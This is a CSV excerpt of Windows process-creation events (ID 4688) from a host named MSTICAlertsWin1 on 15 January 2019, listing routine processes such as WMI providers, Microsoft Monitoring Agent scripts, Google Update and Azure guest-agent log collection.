267,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:25.650,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10f4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:25.650
268,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1020,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:26.000
269,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:27:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x638,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:27:26.000
270,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:01.517,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10cc,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,%%1936,0x440,"""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:01.517
271,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x107c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:24.003
272,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1064,C:\Windows\System32\conhost.exe,%%1936,0x107c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:24.020
273,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:25.770,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1220,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:25.770
274,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1258,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:26.013
275,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:28:33.090,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xab8,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,%%1936,0x440,"""C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"" /ua /installsource scheduler",C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:28:33.090
276,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:11:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbd8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:11:26.000
277,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:24.007
278,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xcd8,C:\Windows\System32\conhost.exe,%%1936,0x123c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:24.023
279,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:25.403,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\MusNotification.exe,%%1936,0x440,C:\Windows\system32\MusNotification.exe Display,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:25.403
280,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:25.590,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa10,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:25.590
281,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:12:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1298,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:12:26.003
282,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:29:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xac4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:29:26.010
283,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:24.007
284,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1128,C:\Windows\System32\conhost.exe,%%1936,0x364,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:24.023
285,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:25.710,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc54,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:25.710
286,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:30:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12e8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:30:26.000
287,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:24.003
288,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17f0,C:\Windows\System32\conhost.exe,%%1936,0x17fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:24.020
289,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:25.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1434,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:25.453
290,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:16:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1404,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:16:26.007
291,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:23:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13a4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:23:26.000
292,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:23:43.103,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10f4,C:\Windows\System32\taskhostw.exe,%%1936,0x440,taskhostw.exe SYSTEM,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:23:43.103
293,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11e8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:24.000
294,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\conhost.exe,%%1936,0x11e8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:24.017
295,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:25.307,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:25.307
296,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:24:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x338,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:24:26.000
297,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:24.000
298,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x640,C:\Windows\System32\conhost.exe,%%1936,0xfbc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:24.017
299,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:25.867,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1320,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:25.867
300,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:26.007
301,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:37.180,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1388,C:\Windows\System32\cmd.exe,%%1936,0x690,"""cmd""",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:37.180
302,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:44:37.193,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11c8,C:\Windows\System32\conhost.exe,%%1936,0x1388,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:44:37.193
303,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:21:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x544,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:21:26.000
304,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x894,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:24.017
305,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xde8,C:\Windows\System32\conhost.exe,%%1936,0x894,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:24.030
306,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:25.360,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x778,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:25.360
307,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:22:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x2f8,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:22:26.010
308,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:15:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:15:26.000
309,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1c4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:24.007
310,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x99c,C:\Windows\System32\conhost.exe,%%1936,0x1c4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:24.027
311,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:25.550,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10c8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:25.550
312,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:16:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e0,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:16:26.000
313,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:24.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1550,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:24.007
314,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x15d0,C:\Windows\System32\conhost.exe,%%1936,0x1550,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:24.023
315,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:22:25.863,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13b4,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:22:25.863
